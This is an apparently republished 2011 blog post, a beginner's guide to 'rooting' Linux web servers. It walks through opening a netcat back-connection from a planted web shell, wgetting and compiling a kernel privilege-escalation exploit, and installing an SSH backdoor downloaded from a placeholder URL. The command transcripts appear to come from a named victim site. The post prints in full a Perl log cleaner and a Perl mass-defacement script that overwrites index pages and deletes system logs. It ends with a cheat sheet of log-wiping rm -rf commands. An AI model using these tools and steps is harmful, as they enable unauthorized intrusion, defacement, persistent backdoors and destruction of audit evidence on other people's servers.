Thursday, January 27, 2011

ROOTING LINUX SERVERS


# Title: Rooting Linux Servers for beginners
# Date : 25 January 2011
# Author: Cyb3R_ShubhaM aKa L0c4lr00T
# Email: l0c4lr00t[at]yahoo.in
# Official Mail: ShubhaM[at]AcademyOfhacking.com
# Facebook: fb[dot]me/yoShubH

# Introduction- Hello All, This My second paper after Sql Injection. My first was much
successful :) thanks
to all for all those Lovely compliments. This paper will not be so long as my first one was
of 14 pages :D.
Let's Start,
# Things you need-
=> A Shell on a website
=> An Exploit
=> Log cleaner
=> Ssh Backdoor
=> Netcat
=> A Brain
=> Get these from Google ;) lolz
# What is rooting ?
A. Getting access to the user => "root", the main admin of the site.
# What is the need of rooting ?
A. Getting Juicy info :)
Now I begin,
# Getting Backconnection to the server-
=> Copy the Netcat directory to C:\
=> Open command prompt, type: CD C:\NETCAT
It'll look like this:
[code]
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Ash>cd c:\netcat
c:\netcat>
[/code]
=> Now Type: nc -l -v -p 2121
It'll look like-
[code]
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...
-1-


[/code]
=> Open your Shell in your browser, go to the backconnection tab, if it is not there get a
shell like "B374k" or Any other
thats your choice.
=> Specify your ip & port as 2121. press connect, now you'll get a shell to the server, you
can give commands to the server through that shell.
# Getting a Right exploit for the server-
=> Type : Uname -a & hit enter.
It'll look something like this:
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010
x86_64 x86_64 x86_64 GNU/Linux
[/code]
=> It shows the kernal version of the server is: 2.6.18-194.26.1.el5
& Year is 2010.
=> You need to find a perfect exploit for it. you can find them at-
# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com
# Leetupload.com
# Compiling & executing exploit-
=> Now I've got a exploit, & it is written in C. So I can't execute it by just uploading.
but I need to compile it.
=> Before proceeding further, Cd into the tmp directory, coz it is always writable. So type:
Cd /home/XXXXX/public_html/tmp
// The path can be different, replace it with yours.
=> So first I'll get the exploit on the server, So I type : Wget
http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this-
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ wget
http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/2010-exploits/exploit.c
Resolving www.exploitsite.net... 199.58.192.192
Connecting to www.exploitsite.net|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'
0K .......... .... 100% 189K=0.08s
2011-01-25 08:21:44 (189 KB/s) - `exploit.c' saved [15088/15088]
[/code]
-2-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
=> now change the permission of the exploit to 777.
Type: Chmod 777 exploit.c
It may look like:
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ chmod 777 ImpelDown.c
[/code]
=> Now the exploit is On my server, I just need to compile & execute it.
So, I'll give the command: gcc -o exploit exploit.c
It'll compile & save the exploit as => exploit
It may look like-
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ gcc -o exploit exploit.c
[/code]
=> Next step is to execute it So we'll type: ./exploit
It may look like:
[code]
[admin@www.saijyotishvani.com /home/saijyoti/public_html/tmp]$ gcc -o ImpelDown.c
got root you m0f0 !!
[/code]
=> Now it say got root. Let's Check is it true,
Type: id
It may look like
[code]
uid=0(saijyoti) gid=0(saijyoti) groups=0(root)
[/code]
=> Which Means I got root :)
# Installing Backdoor-
=> type- Wget urlofbackdoor.com/sshdoor.zip
=> Then Type,
Unzip Sshdoor.zip
=> Then type, ./run pass port
^ replace pass with your password, & a port.
=> Now connect with putty & enjoy root privileges. ;)
##################################################################################
=> Methods to execute exploits written in other languages-
-3-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
#C exploitgcc
-o exploit exploit.c
chmod +x exploit
./exploit
#Perlperl
exploit.pl
#pythonpython
exploit.py
#phpphp
exploit.php
#zip
unzip exploit.zip
./run
##################################################################################
=> Cleaning Logs-
# you can use my log cleaner to clear your track :D. It is written in perl. save it as
anything.pl
& to execute type: perl anything.pl
here is the code-
[perl]
#!usr/bin/perl -w #Warnings enabled!
#Log cleaner version Public
#Give Credits Where Needed - Kouros!
#This took time, Hope you fucking use it :D
#Report bugs to info@Kouros-bl4ckhat.com
#NOTE - YOU MUST BE ROOT!
print qq^
####################################
# Log Cleaner 3.0 PUBLIC #
# Kouros #
# #
# Virangar Security Team #
# http://www.Kouros-bl4ckhat.com #
####################################
^;
while(1) {
print "Enter Which OS: "; #User Input
chomp($os = <STDIN>); #Takes it into memory
if($os eq "help"){
-4-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
print "[+]Enter Your OS! Choose from 'linux', 'aix', 'sunos', 'irix'\n";
print "[+]Hit enter with OS, Let the script do its work\n";
print "[+]Note: You MUST Be Root!\n";
print "[+]Contact Info[at]Kouros-bl4ckhat [dot] Com";
print "[+]For Bug finds... Have Fun!\n";
print "[+] - Kouros";
}
if($os eq "linux"){ #If linux typed, do the following and start brackets
foreach my $logphile(@linux) {
unlink($logphile) || print "[-]Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "sunos"){ #If sunos typed, do the following and start brackets
foreach my $logphile(@sunos) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "aix"){ #If aix typed, do the following and start brackets
foreach my $logphile(@aix) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} elsif($os eq "irix"){ #If irix typed, do the following and start bracket
foreach my $logphile(@irix) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
}
} else { print"Umm WTF !?\n"; }
#Logs of Irix Systems
{ #Start Irix Bracket
@irix = ("/var/adm/SYSLOG", "/var/adm/sulog", "/var/adm/utmp", "/var/adm/utmpx",
"/var/adm/wtmp", "/var/adm/wtmpx", "/var/adm/lastlog/",
"/usr/spool/lp/log", "/var/adm/lp/lp-errs", "/usr/lib/cron/log",
"/var/adm/loginlog", "/var/adm/pacct", "/var/adm/dtmp",
"/var/adm/acct/sum/loginlog", "var/adm/X0msgs", "/var/adm/crash/vmcore",
"/var/adm/crash/unix") #End Array
} #End Irix Bracket
#Log sof Aix Systems
{ #Start Aix Bracket
@aix = ("/var/adm/pacct", "/var/adm/wtmp", "/var/adm/dtmp", "/var/adm/qacct",
"/var/adm/sulog", "/var/adm/ras/errlog", "/var/adm/ras/bootlog",
"/var/adm/cron/log", "/etc/utmp", "/etc/security/lastlog",
"/etc/security/failedlogin", "usr/spool/mqueue/syslog") #End Array
} #End Aix Bracket
#Logs of SunOS Systems
{ #Start SunOS Bracket
@sunos = ("/var/adm/messages", "/var/adm/aculogs", "/var/adm/aculog",
"/var/adm/sulog", "/var/adm/vold.log", "/var/adm/wtmp",
"/var/adm/wtmpx", "/var/adm/utmp", "/var/adm/utmpx",
"/var/adm/log/asppp.log", "/var/log/syslog",
"/var/log/POPlog", "/var/log/authlog", "/var/adm/pacct",
"/var/lp/logs/lpsched", "/var/lp/logs/requests",
"/var/cron/logs", "/var/saf/_log", "/var/saf/port/log") #End Array
} #End Sunos bracket
#Logs of Linux Systems
-5-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
{ #Start Linux Bracket
@linux = ("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp",
"/var/log/secure","/root/.ksh_history", "/root/.bash_history",
"/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp",
"/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs",
"/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy",
"/var/log/proftpd.xferlog", "/var/log/proftpd.access_log",
"/var/log/httpd/error_log", "/var/log/httpsd/ssl_log",
"/var/log/httpsd/ssl.access_log", "/etc/mail/access",
"/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority",
"/var/log/poplog", "/var/log/news.all", "/var/log/spooler",
"/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err",
"/var/log/news/news.notice",
"/var/log/news/suck.err", "/var/log/news/suck.notice",
"/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks",
"/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log",
"/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs",
"/var/log/auth") #End array
} #End linux bracket
} #Ends Loop
[/perl]
##################################################################################
=> Mass deface- I've a perl to mass deface sites on the server. execute it as the same way
as above.
[perl]
# MSRml V 0.1 #
# #
# MOROCCO.SECURITY.RULZ mass defacer and log eraser #
# #
# coded by PRI[ll #
# #
# !!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!! #
# #
# 05/07/2005 #
# #
-6-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
# usage : perl MSRml.pl <path to index> #
# #
# example : perl MSRml.pl /tmp/index.html #
# #
# the_r00t3r@hotmail.com #
#!/usr/bin/perl
use strict;
my $index = $ARGV[0];
if ($ARGV[0])
{
if( -e $index )
{
system "echo -e "33[01;34mStarted MSRml V0.1 by PRI[ll Ok !!33[01;37m"n";
system "echo -e "\033[01;37mDefacing all homepages ..."n";
system "find / -name "index*" -exec cp $index {} \;";
system "find / -name "main*" -exec cp $index {} \;";
system "find / -name "home*" -exec cp $index {} \;";
system "find / -name "default*" -exec cp $index {} \;";
system "echo -e "\033[01;37m[+] done ! all sites in this box are defaced !"n";
system "echo -e "\033[01;37m----------------------------------------------------------"n";
system "echo -e "\033[01;37mCleaning up logs ..."n";
system "echo -e "33[01;34m---------erasing default log files (too fast
=))---------33[01;37m"n";
if( -e "/var/log/lastlog" )
{
system 'rm -rf /var/log/lastlog';
system "echo -e "\033[01;37m [*]/var/log/lastlog -erased Ok"n";
}
-7-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
else
{
system "echo -e "\033[01;31m[*]/var/log/lastlog - No such file or directory\033[01;37m"n";
}
if( -e "/var/log/wtmp" )
{
system 'rm -rf /var/log/wtmp';
system "echo -e "\033[01;37m [*]/var/log/wtmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/log/wtmp - No such file or directory\033[01;37m"n";
}
if( -e "/etc/wtmp" )
{
system 'rm -rf /etc/wtmp';
system "echo -e "\033[01;37m [*]/etc/wtmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/etc/wtmp - No such file or directory\033[01;37m"n";
}
if( -e "/var/run/utmp" )
{
system 'rm -rf /var/run/utmp';
system "echo -e "\033[01;37m [*]/var/run/utmp -erased Ok"n";
}
else
-8-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
{
system "echo -e "\033[01;31m[*]/var/run/utmp - No such file or directory\033[01;37m"n";
}
if( -e "/etc/utmp" )
{
system 'rm -rf /etc/utmp';
system "echo -e "\033[01;37m [*]/etc/utmp -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/etc/utmp - No such file or directory\033[01;37m"n";
}
if( -e "/var/log" )
{
system 'rm -rf /var/log';
system "echo -e "\033[01;37m [*]/var/log -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/log - No such file or directory\033[01;37m"n";
}
if( -e "/var/logs" )
{
system 'rm -rf /var/logs';
system "echo -e "\033[01;37m [*]/var/logs -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/logs - No such file or directory\033[01;37m"n";
-9-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
}
if( -e "/var/adm" )
{
system 'rm -rf /var/adm';
system "echo -e "\033[01;37m [*]/var/adm -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/adm - No such file or directory\033[01;37m"n";
}
if( -e "/var/apache/log" )
{
system 'rm -rf /var/apache/log';
system "echo -e "\033[01;37m [*]/var/apache/log -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/apache/log - No such file or directory\033[01;37m"n";
}
if( -e "/var/apache/logs" )
{
system 'rm -rf /var/apache/logs';
system "echo -e "\033[01;37m [*]/var/apache/logs -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/var/apache/logs - No such file or directory\033[01;37m"n";
}
-10-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
if( -e "/usr/local/apache/log" )
{
system 'rm -rf /usr/local/apache/log';
system "echo -e "\033[01;37m [*]/usr/local/apache/log -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/usr/local/apache/log - No such file or
directory\033[01;37m"n";
}
if( -e "/usr/local/apache/logs" )
{
system 'rm -rf /usr/local/apache/logs';
system "echo -e "\033[01;37m [*]/usr/local/apache/logs -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/usr/local/apache/logs - No such file or
directory\033[01;37m"n";
}
if( -e "/root/.bash_history" )
{
system 'rm -rf /root/.bash_history';
system "echo -e "\033[01;37m [*]/root/.bash_history -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/root/.bash_history - No such file or directory\033[01;37m"n";
}
if( -e "/root/.ksh_history" )
-11-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
{
system 'rm -rf /root/.ksh_history';
system "echo -e "\033[01;37m [*]/root/.ksh_history -erased Ok"n";
}
else
{
system "echo -e "\033[01;31m[*]/root/.ksh_history - No such file or directory\033[01;37m"n";
}
system "echo -e "\033[01;37m[+] -----done all default log and bash_history files erased !!"n";
system "echo -e "33[01;34m---------Now Erasing the rest of the machine log files (can be
long :S)---------33[01;37m"n";
system 'find / -name *.bash_history -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all *.bash_history files -erased Ok!"n";
system 'find / -name *.bash_logout -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all *.bash_logout files -erased Ok!"n";
system 'find / -name "log*" -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all log* files -erased Ok!"n";
system 'find / -name *.log -exec rm -rf {} ;';
system "echo -e "\033[01;37m[*] all *.log files -erased Ok!"n";
system "echo -e "33[01;34m-------[+] !done all log files erased![+]-------33[01;37m"n";
system "echo -e "33[01;34m---------------------------------------------------33[01;37m"n";
system "echo -e "33[01;34m-----------------MSRml V 0.1----------------------33[01;37m"n";
}
else
{
system "echo -e "\033[01;31m[-] Failed ! the path to u're index could not be found
!\033[01;37m"n";
exit;
}
-12-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
}
else
{
system "echo -e "\033[01;37m!!Morocco.Security.Rulz mass defacer and log eraser !!"n";
system "echo -e "\033[01;37m!!!!!!!!!!!!!!!!!!coded by PRI[ll!!!!!!!!!!!!!!!!!!!!!!!!"n";
system "echo -e
"\033[01;31m!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!\033[01;37m"n";
system "echo -e "\033[01;37musage : perl $0 <path too u're index>"n";
system "echo -e "\033[01;37mexample : perl $0 /tmp/index.html"n";
exit;
}
[/code]
##################################################################################
=> Important Commands-
./../mainfile.php - Config file.
ls -la - Lists directory's.
ifconfig {eth0 etc} - Ipconfig equiv.
ps aux - Show running proccess's.
gcc in_file -o out_file - Compile c file.
cat /etc/passwd - List's accounts.
sudo - Superuser Do run a command as root provided you have perms
in /etc/sudoers.
id - Tells you what user your logged in as.
which wget curl w3m lynx - Check's to see what downloaders are
present.
uname -r - Shows all release info (or) cat /etc/release.
uname -a - Shows all kernal info (or) cat /etc/issue
last -30 - Last logged 30 ip's can change to desired number.
useradd - Create new user account.
usermod - Modify user account.
w - See who is currently logged on.
-13-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
locate password.txt - Locates password.txt in current dur can use *.
rm -rf / - Please be carefull with this command, i cannot stress this
enough.
arp -a - Lists other machines are on the same subnet.
lsattr -va - ls file attributes on linux second extended file system
find / -type f -perm -04000 -ls - Finds suid files.
find . -type f -perm -04000 -ls - Finds suid files in current dir.
find / -type f -perm -02000 -ls - Finds all sgid files.
find / -perm -2 -ls - Finds all writable files and folders.
find . -perm -2 -ls - Finds all writable files and folders in current dir.
find / -type f -name .bash_history - Finds bash history.
netstat -an | grep -i listen - shows open ports.
cut -d: -f1,2,3 /etc/passwd | grep :: - From memory creates a user
with no pass.
find /etc/ -type f -perm -o+w 2> /dev/null - Write in /etc/passwd?.
cat /proc/version /proc/cpuinfo - Cpu info.
locate gcc- Finds gcc if installed.
set - Display system variables.
echo $path- Echo current path.
lsmod- Dumps kernal modules.
mount/df- Check mounted file system.
rpm -qa- Check patch level for RedHat 7.0.
dmesg- Check hardware ino.
cat /etc/syslog.conf - Log file.
uptime - Uptime check.
cat /proc/meminfo - Memory check.
find / -type f -perm -4 -print 2> /dev/null- Find readble files.
find / -type f -perm -2 -print 2> /dev/null - Find writable files.
chmod ### $folder - Chmod folder.
-14-
C:\Users\Ash\Desktop\R00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
ls -l -b - Verbosly list directory's
-------------clear-logs-----------------
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
-------------------------------------------------
cat filename | more
^ Pipe large files through more for easy reading
ifconfig | grep Addr
^ Get the local Internet Protocol and Hardware address(s) for your machine
cat binary | awk "{print $5}"
^ Print a binary file out in hex
$(echo "HEAD / HTTP/1.0";echo "";echo "") | telnet host 80
^ Get the webserver type and identification
The best feature of bash is piping. Piping means threading the output of one
program to another. For example you can do ls | more to pipe the output of
ls to more and easily read the contents of large directories. You can also do
ls | grep myfile to find myfile in the current directory.
cd /;find | grep goodfile
^ Search the entire FileSystem for a file called goodfile
su -x "command"
^ Run a command as root
sudo command
^ Run a command as a su-uid user
chmod a+rwx file
^ Change the permissions of a file and make it executable, readable, and writable to all users
rm removes a file only if the user deleting it has permissions to that file.
rm -f removes a file forcibly (permissions still apply).
rm -rf recursively and forcefully remove a directory. You should know about permissions by
now.
##################################################################################


This is the end of my this paper, Hope you enjoyed it. :)
# Greetz- C00lt04d,Cyb3Rgr00f,Cyb3Rs4m,Bad Man,h4ck0lic,Reborn, 3thicaln00b,Br0wnSug4r & All
my friends. ;)
## References ##
# Indishell.in
# Academy Of Hacking- http://www.orkut.co.in/Community?cmm=43323325
# Google :)
##################################################################################

No comments:

Post a Comment